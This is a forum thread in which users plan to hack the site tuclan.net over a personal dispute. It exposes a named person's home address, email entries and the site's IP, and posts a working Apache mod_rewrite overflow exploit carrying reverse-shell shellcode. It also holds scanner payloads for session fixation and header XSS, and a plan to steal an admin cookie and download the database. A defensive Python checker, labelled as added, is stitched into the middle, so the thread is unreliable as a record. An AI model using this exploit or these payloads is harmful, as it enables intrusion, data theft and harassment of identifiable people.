here is what i know.
User Info
Name: James Williamson
Address: 8705 Higdon Drive Vienna VA 22182
Email: [email protected]
Email: [email protected]
Website Info
Website IP: 74.208.31.81
Name Server: NS29.1AND1.COM
Name Server: NS30.1AND1.COM
Ping Results:
count  ttl (hops)  rtt (ms)  from
1      53          12        74.208.31.81
2      53          12        74.208.31.81
3      53          12        74.208.31.81
4      53          12        74.208.31.81
5      53          12        74.208.31.81
Statistics
packets sent 5, received 5 (100%), lost 0 (0%)
times (ms): min 12, avg 12, max 12
-edit possible-
tuclan.net
- Sethioz
- Admin
- Posts: 4764
- Joined: Fri Jul 27, 2007 5:11 pm
- Custom: Gaming YT > https://youtube.com/SethiozEntertainment
Game Hacking YT > https://youtube.com/sethioz
Game Hacks Store > https://sethioz.com/shopz - Location: unknown
- Contact:
Re: tuclan.net
oookey .. lets see.
you should have added that you wanna own it...anyways.
seems to be running in Unix.
server banner - apache 1.3.33 unix
webserver - apache 1.x (1.something)
forum - phpbb 2...
FTP IP 74.208.31.81 port 21
FTP - ftp.tuclan.net (don't know admin's username)
i gonna run several scans on it .. to see if it has any holes in it. (SQL, RFI, XSS ...etc)
so far i dont know what system it uses .. it seems to be phpnuke .. but im not 100% sure...it also maybe e107.
need to check some source code and data.
I will keep this topic up to date ...
...scanning....
update
what the hell ? ..it seems that its not a website system at all .. it seems to be simple html pages linked together :S .. that's lame. Forum is phpbb 2, but im not sure what version.
There is site tree in bottom of message
Update
Here is something that should work .. a shell ''mod rewrite off-by-one remote overflow''
#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one(Win32).
#
# by axis <axis@ph4nt0m>
# http://www.ph4nt0m.org
# 2007-04-06
#
# Tested on Apache 2.0.58 (Win32)
# Windows2003 CN SP1
#
# Vulnerable Apache Versions:
# * 1.3 branch: >1.3.28 and <1.3.37
# * 2.0 branch: >2.0.46 and <2.0.59
# * 2.2 branch: >2.2.0 and <2.2.3
#
#
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
#
# first POC by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
# http://www.milw0rm.com/exploits/2237
#
#
#
# to successfully exploit the vuln,there are some conditions
# http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html
#
#
# some compilers added padding to the stack, so they could not be exploited,like gcc under redhat
#
# for more details about the vuln please see:
# http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded
#
#
# no opcodes needed under windows!
# it will directly run our shellcode
#
# my apache config file
# [httpd.conf]:
# RewriteEngine on
# RewriteRule 1/(.*) $1
# RewriteLog "logs/rewrite.log"
# RewriteLogLevel 3
#
#
# Usage:
# [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141
# mod_rewrite apache off-by-one overflow
#
# [axis@opensystemX axis]$ nc -vv -n -l -p 1154
# listening on [any] 1154 ...
# connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077
# Microsoft Windows [版本 5.2.3790]
# (C) 版权所有 1985-2003 Microsoft Corp.
#
# D:\Apache\Apache2>exit
# exit
# sent 5, rcvd 100
#
#
#
# bad chars for the shellcode (the original comment here was in Chinese and is
# garbled in this copy; the list of bad chars itself survives below):
# 0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b
#
echo -e "mod_rewrite apache off-by-one overflow"
if [ $# -ne 1 ] ; then
echo "Usage: $0 webserver"
exit
fi
host=$1
#use ldap:// to trigger the vuln, "Ph4nt0m" is any arbitrary string
echo -ne "GET /1/ldap://ph4nt0m/`perl -e 'print "Ph4nt0m"x5'`\
# %3f to trigger the vuln
%3fA%3fA%3f\
#string "CCCC.." is any arbitrary string, use %3f to trigger the vuln
#%90 is the machine code we will jmp to(NOP),run shellcode from here
`perl -e 'print "C"x10'`%3fC%3f%90\
# shellcode,reverse shell to 192.168.0.1 ,port 1154 alpha2 encoded
`perl -e 'print "\
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49\
\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63\
\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x42\x32\x42\x41\x41\x32\
\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x79\x79\x6c\x51\
\x7a\x6a\x4b\x50\x4d\x4d\x38\x6b\x49\x79\x6f\x49\x6f\x6b\x4f\x65\
\x30\x4c\x4b\x72\x4c\x45\x74\x51\x34\x4e\x6b\x71\x55\x77\x4c\x6c\
\x4b\x33\x4c\x64\x45\x33\x48\x64\x41\x5a\x4f\x4c\x4b\x72\x6f\x36\
\x78\x4c\x4b\x73\x6f\x45\x70\x66\x61\x4a\x4b\x53\x79\x4e\x6b\x44\
\x74\x4e\x6b\x73\x31\x38\x6e\x55\x61\x79\x50\x6c\x59\x6c\x6c\x4b\
\x34\x6f\x30\x74\x34\x34\x47\x59\x51\x5a\x6a\x76\x6d\x76\x61\x6f\
\x32\x5a\x4b\x79\x64\x55\x6b\x33\x64\x51\x34\x41\x38\x30\x75\x4b\
\x55\x6e\x6b\x33\x6f\x44\x64\x46\x61\x7a\x4b\x32\x46\x6e\x6b\x34\
\x4c\x42\x6b\x6e\x6b\x73\x6f\x77\x6c\x54\x41\x58\x6b\x43\x33\x74\
\x6c\x6c\x4b\x4d\x59\x50\x6c\x74\x64\x75\x4c\x52\x41\x6f\x33\x50\
\x31\x6b\x6b\x72\x44\x4c\x4b\x50\x43\x66\x50\x6c\x4b\x33\x70\x64\
\x4c\x6c\x4b\x74\x30\x65\x4c\x4e\x4d\x4e\x6b\x53\x70\x47\x78\x33\
\x6e\x51\x78\x4c\x4e\x52\x6e\x56\x6e\x58\x6c\x50\x50\x59\x6f\x79\
\x46\x70\x66\x62\x73\x75\x36\x75\x38\x66\x53\x64\x72\x42\x48\x53\
\x47\x32\x53\x50\x32\x71\x4f\x71\x44\x49\x6f\x48\x50\x52\x48\x5a\
\x6b\x48\x6d\x6b\x4c\x65\x6b\x70\x50\x4b\x4f\x68\x56\x61\x4f\x4e\
\x69\x4a\x45\x30\x66\x6e\x61\x78\x6d\x67\x78\x73\x32\x42\x75\x52\
\x4a\x75\x52\x6b\x4f\x7a\x70\x61\x78\x6b\x69\x55\x59\x6c\x35\x6e\
\x4d\x51\x47\x4b\x4f\x4e\x36\x70\x53\x50\x53\x56\x33\x76\x33\x43\
\x73\x32\x73\x31\x53\x52\x73\x6b\x4f\x4a\x70\x70\x68\x6f\x30\x6d\
\x78\x35\x50\x46\x61\x30\x66\x30\x68\x76\x64\x6c\x42\x33\x56\x70\
\x53\x4e\x69\x78\x61\x4c\x55\x75\x38\x4a\x4c\x58\x79\x4c\x6a\x73\
\x50\x53\x67\x6b\x4f\x6a\x76\x73\x5a\x72\x30\x73\x61\x53\x65\x4b\
\x4f\x6a\x70\x52\x46\x31\x7a\x52\x44\x73\x56\x50\x68\x51\x73\x50\
\x6d\x32\x4a\x62\x70\x51\x49\x47\x59\x6a\x6c\x6c\x49\x4b\x57\x42\
\x4a\x73\x74\x6d\x59\x6d\x32\x35\x61\x6f\x30\x48\x73\x4f\x5a\x6f\
\x65\x4c\x49\x39\x6d\x4b\x4e\x33\x72\x54\x6d\x6b\x4e\x33\x72\x34\
\x6c\x6c\x4d\x50\x7a\x57\x48\x4e\x4b\x4c\x6b\x6c\x6b\x71\x78\x32\
\x52\x6b\x4e\x6c\x73\x42\x36\x49\x6f\x73\x45\x65\x78\x6b\x4f\x6e\
\x36\x71\x4b\x42\x77\x43\x62\x53\x61\x76\x31\x70\x51\x30\x6a\x35\
\x51\x62\x71\x76\x31\x72\x75\x43\x61\x4b\x4f\x6e\x30\x73\x58\x4e\
\x4d\x7a\x79\x37\x75\x38\x4e\x31\x43\x4b\x4f\x4a\x76\x30\x6a\x39\
\x6f\x6b\x4f\x70\x37\x6b\x4f\x6e\x30\x45\x38\x39\x77\x54\x39\x79\
\x56\x71\x69\x79\x6f\x53\x45\x56\x64\x69\x6f\x69\x46\x6b\x4f\x62\
\x57\x6b\x4c\x4b\x4f\x6a\x70\x50\x68\x6a\x50\x6f\x7a\x37\x74\x43\
\x6f\x72\x73\x4b\x4f\x6a\x76\x79\x6f\x38\x50\x63\
"'`\
HTTP/1.0\r\n\
Host: $host\r\n\r\n" | nc -vv $host 80
# milw0rm.com [2007-04-07]
- Attachment: tuclantree.JPG (site tree)
Re: tuclan.net
PHPSESSID session fixation
This script is vulnerable to PHPSESSID session fixation attacks.
By injecting a custom PHPSESSID it is possible to alter the PHP session cookie. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site.
This vulnerability affects /aff.
Request
GET /aff/?PHPSESSID=acunetixsessionfixation HTTP/1.0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Host: tuclan.net
Connection: Close
Pragma: no-cache
Response
HTTP/1.1 200 OK
Date: Wed, 12 Dec 2007 21:09:38 GMT
Server: Apache/1.3.33 (Unix)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
------------------------------------------------------------------------------------------------------------------
Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
This alert has been generated using only banner information. It may be a false positive.
Apache mod_rewrite is prone to an off-by-one buffer-overflow condition. The vulnerability arising in the mod_rewrite module's ldap scheme handling allows for potential memory corruption when an attacker exploits certain rewrite rules.
Affected Apache versions:
Apache 1.3.28 - 1.3.36 with mod_rewrite
Apache 2.2.0 - 2.2.2 with mod_rewrite
Apache 2.0.46 - 2.0.58 with mod_rewrite
Attack details
Current version is Apache/1.3.33
------------------------------------------------------------------------------------------------------------------
Apache version older than 1.3.34
Vulnerability description
This alert has been generated using only banner information. It may be a false positive.
Two potential security issues have been fixed in Apache version 1.3.34:
If a request contains both Transfer-Encoding and Content-Length headers, remove the Content-Length, mitigating some HTTP Request Splitting/Spoofing attacks.
Added TraceEnable [on|off|extended] per-server directive to alter the behavior of the TRACE method.
Affected Apache versions (up to 1.3.33).
This vulnerability affects Web Server.
------------------------------------------------------------------------------------------------------------------
Unfiltered Header Injection in Apache 1.3.34/2.0.57/2.2.1
Vulnerability description
This version of Apache is vulnerable to HTML injection (including malicious Javascript code) through the "Expect" header. Until now it was not classed as a security vulnerability, as an attacker has no way to influence the Expect header a victim will send to a target site. However, according to Amit Klein's paper "Forging HTTP request headers with Flash", there is a working cross site scripting (XSS) attack against Apache 1.3.34, 2.0.57 and 2.2.1 (as long as the client browser is IE or Firefox, and it supports Flash 6/7+).
Affected Apache versions (up to 1.3.34/2.0.57/2.2.1).
Request
GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Host: tuclan.net
Cookie: PHPSESSID=4c1a966d8d5e01bb4d5142ba31d7bb99;tuclan_forum_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D;tuclan_forum_sid=fdd0deb96a2ea5e76b55c2309c255db4
Connection: Close
Expect: <script>alert(892727953)</script>
Pragma: no-cache
Response
HTTP/1.1 417 Expectation Failed
Date: Wed, 12 Dec 2007 08:09:08 GMT
Server: Apache/1.3.33 (Unix)
Connection: close
Content-Type: text/html; charset=iso-8859-1
this first one ... this /aff one. it means you can steal cookie and then login as admin..into admin panel. so you can download db.
i also gonna run other scan on it later ...
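A defender-side counterpart to the three scanner findings above, added here as an example and not part of the original thread: a small Python checker that parses raw HTTP requests of the shape the scanner sent and flags a PHPSESSID supplied in the query string, HTML in an Expect header, and an ldap:// target carrying %3f sequences (the request shape the mod_rewrite advisory describes). The sample requests are constructed and the host name is a placeholder.

```python
import re
from typing import Dict, List

# Constructed sample requests (not real traffic). Each mirrors one pattern from the
# scanner output: session id in the URL, HTML in Expect, ldap:// path with %3f,
# plus one clean request that carries its PHPSESSID in a cookie where it belongs.
SAMPLE_REQUESTS = [
    "GET /aff/?PHPSESSID=acunetixsessionfixation HTTP/1.0\r\nHost: example.test\r\n\r\n",
    "GET / HTTP/1.0\r\nHost: example.test\r\nExpect: <script>alert(1)</script>\r\n\r\n",
    "GET /1/ldap://x/AAAA%3fA%3fA%3f HTTP/1.0\r\nHost: example.test\r\n\r\n",
    "GET /index.html HTTP/1.0\r\nHost: example.test\r\nCookie: PHPSESSID=abc123\r\n\r\n",
]


def parse_request(raw: str) -> Dict[str, object]:
    """Split a raw HTTP/1.x request into method, target and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def classify(raw: str) -> List[str]:
    """Return the names of the suspicious patterns present in one request."""
    req = parse_request(raw)
    target: str = req["target"]  # type: ignore[assignment]
    headers: Dict[str, str] = req["headers"]  # type: ignore[assignment]
    findings: List[str] = []
    # Session id offered via the URL. Only dangerous if PHP accepts it (use_trans_sid
    # on / use_only_cookies off) and the app never regenerates the id at login.
    if re.search(r"[?&]PHPSESSID=", target, re.IGNORECASE):
        findings.append("session-id-in-url")
    # Expect header containing markup: old Apache echoes it unescaped into its 417 page.
    if re.search(r"<[a-z/!]", headers.get("expect", ""), re.IGNORECASE):
        findings.append("html-in-expect-header")
    # ldap:// target with %3f sequences, the request shape from the mod_rewrite advisory.
    if re.search(r"ldap://[^ ]*%3f", target, re.IGNORECASE):
        findings.append("mod-rewrite-ldap-probe")
    return findings


def scan(requests: List[str]) -> Dict[int, List[str]]:
    """Map request index -> findings, omitting requests with nothing to report."""
    report: Dict[int, List[str]] = {}
    for i, raw in enumerate(requests):
        found = classify(raw)
        if found:
            report[i] = found
    return report


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_REQUESTS).items():
        print(f"request {idx}: {', '.join(hits)}")
```

In production the same checks belong in a WAF rule or a log-parsing job, alongside the real fixes: session.use_only_cookies=1 plus session_regenerate_id() at login, and an Apache build newer than the versions the scanner lists.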
Re: tuclan.net
so we are good to go to own them. these guys continue to talk. and talk, i have given multiple warnings to stop and they didnt. we have to take action sethioz. Check out my website for the details. i have screenshots. You can make an account there. If you do, they'll ask what their favorite game to play is. just exit the register and go back into it, the question will change
Now i need to know how to do this xploit. get on MSN asap
Re: tuclan.net
i think i got it. The mod_rewrite vuln is a BoF, obviously and from what i know its xploited from the server. So we have to connect to the server don't we. This is the only thing i don't understand. its a buffer overflow attack, and its meant to be xploited on apache 1.3.28 - 1.3.36. So we need to connect to the host using PuTTY, or another type of tool, then go to that directory and xploit it according to the vulnerability as seen above.
Re: tuclan.net
no not really lol .. its a shell.
.sh = shell
it has nothing to do with connecting ... its a ready-to-use EXPLOIT.
im not 100% sure what will open/use it .. but it should be something similar to RFI or perl exploits. ..so you simply run it and/or use it.
...i dont get it .. WTF is a sh. well i know it stands for ''shell'' ..but what is the program that runs it.
just like in perl .. you do ''perl script.pl -parameters'' .. if you took a look at this ''sh mod_rewrite.sh 10.0.76.141''
obviously last one is ip. ..so its sh should be sh.exe .. just like in perl and php ..you type php/perl which will run perl.exe/php.exe .. so there should be some program that uses .sh extensions. really dont have mood to look into it ..
Usage:
# [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141
# mod_rewrite apache off-by-one overflow
#
# [axis@opensystemX axis]$ nc -vv -n -l -p 1154
# listening on [any] 1154 ...
# connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077
# Microsoft Windows [版本 5.2.3790]
# (C) 版权所有 1985-2003 Microsoft Corp.
Re: tuclan.net
ok i was wrong ... sh stands for ''bash'' its something similar to linux terminal.
..that's not the problem, problem is that .. this piece of junk exploit doesn't work ! .. it has errors in it. ..or maybe you need to compile it .. but i seriously doubt. im not that stupid ..its a ready to use ''bash'' exploit which doesn't work !
who is interested...you can do some research WHY this exploit doesn't work .. or maybe there is another way to run it...but i seriously doubt.
oh yeah and .. ''cygwin'' is what you need. unix tools for win .. or something like that
- Attachment: bash1.JPG
Re: tuclan.net
where did you go ?? i thought you wanted to hack it ... so depressed lately that i cant just go on with it ...I've found few exploits ... but now i tripped over next problem .. i got owned by linux ...it wont install .. just some fucking crap argh linux
...need to use gcc, to compile few things ...so i can test few other things .. but damn linux wont install.